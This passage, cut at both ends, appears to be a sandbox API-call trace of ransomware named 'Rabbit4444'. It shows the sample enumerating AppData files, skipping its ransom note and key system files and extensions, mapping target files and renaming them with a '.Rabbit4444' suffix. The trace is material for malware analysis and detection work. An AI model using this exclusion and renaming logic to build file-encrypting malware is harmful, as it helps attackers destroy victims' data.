(hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.964] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.964] CloseHandle (hObject=0x278) returned 1 [0055.964] CloseHandle (hObject=0x27c) returned 1 [0055.964] GetCurrentThreadId () returned 0xd98 [0055.964] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221c8 [0055.964] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData" [0055.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123818 | out: hHeap=0xe0000) returned 1 [0055.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0055.964] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData" [0055.964] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\" [0055.964] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0055.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.966] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.969] FlushFileBuffers (hFile=0x27c) returned 1 [0055.970] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.970] CloseHandle (hObject=0x27c) returned 1 [0055.970] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData") returned 86 [0055.970] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.970] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715dffc9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x715dffc9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeaaea81c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0055.971] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.971] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.971] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.971] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.971] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715dffc9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x715dffc9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeaaea81c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.971] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.971] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.971] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.971] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.971] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.971] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaaea81c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaaea81c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaaea81c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.971] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.971] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.971] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaaea81c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaaea81c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaaea81c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.971] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0055.971] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.971] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.972] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.972] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.972] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.972] CloseHandle (hObject=0x278) returned 1 [0055.972] CloseHandle (hObject=0x27c) returned 1 [0055.972] GetCurrentThreadId () returned 0xd98 [0055.972] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0055.972] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings" [0055.972] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ec8 | out: hHeap=0xe0000) returned 1 [0055.972] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0055.972] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings" [0055.972] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\" [0055.972] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0055.972] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.975] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.978] FlushFileBuffers (hFile=0x27c) returned 1 [0055.979] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.979] CloseHandle (hObject=0x27c) returned 1 [0055.980] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings") returned 81 [0055.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.981] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeaaea81c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0055.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.981] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.981] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.981] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.981] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeaaea81c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.981] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.981] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.981] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.981] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.981] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.981] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaaea81c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaaea81c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab17c14, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.981] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x9cdd849c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9cdd849c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0055.981] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0055.982] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0055.982] lstrcpyW (in: lpString1=0x130ebdc, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0055.982] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0055.983] lstrlenW (lpString="roaming.lock") returned 12 [0055.983] lstrlenW (lpString="Rabbit4444") returned 10 [0055.983] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0055.983] lstrlenW (lpString=".dll") returned 4 [0055.983] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0055.983] lstrlenW (lpString=".lnk") returned 4 [0055.983] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0055.983] lstrlenW (lpString=".ini") returned 4 [0055.983] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0055.983] lstrlenW (lpString=".sys") returned 4 [0055.983] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0055.983] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x715dffc9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdb0ec246, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0055.983] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0055.983] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0055.983] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0055.984] lstrlenW (lpString="settings.dat") returned 12 [0055.984] lstrlenW (lpString="Rabbit4444") returned 10 [0055.984] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0055.984] lstrlenW (lpString=".dll") returned 4 [0055.984] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0055.984] lstrlenW (lpString=".lnk") returned 4 [0055.984] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0055.984] lstrlenW (lpString=".ini") returned 4 [0055.984] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0055.984] lstrlenW (lpString=".sys") returned 4 [0055.984] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0055.985] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.985] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.985] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14729547806) returned 1 [0055.985] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0055.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0055.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0055.985] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x298 [0055.986] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0055.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123818 [0055.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0055.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123818 | out: hHeap=0xe0000) returned 1 [0055.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0055.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123818 [0055.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0055.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123818 | out: hHeap=0xe0000) returned 1 [0055.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0055.989] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14730004489) returned 1 [0055.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0055.989] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0055.989] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.990] CloseHandle (hObject=0x298) returned 1 [0055.990] CloseHandle (hObject=0x278) returned 1 [0055.990] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 105 [0055.990] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0055.991] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdaed6159, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdaed6159, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdaed6159, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0055.992] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0055.992] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0055.992] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0055.992] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0055.993] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0055.993] lstrlenW (lpString="Rabbit4444") returned 10 [0055.993] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0055.993] lstrlenW (lpString=".dll") returned 4 [0055.993] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0055.993] lstrlenW (lpString=".lnk") returned 4 [0055.993] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0055.993] lstrlenW (lpString=".ini") returned 4 [0055.993] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0055.993] lstrlenW (lpString=".sys") returned 4 [0055.994] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0055.994] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.994] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.994] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14730454785) returned 1 [0055.994] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0055.994] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0055.994] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0055.994] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x298 [0055.995] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 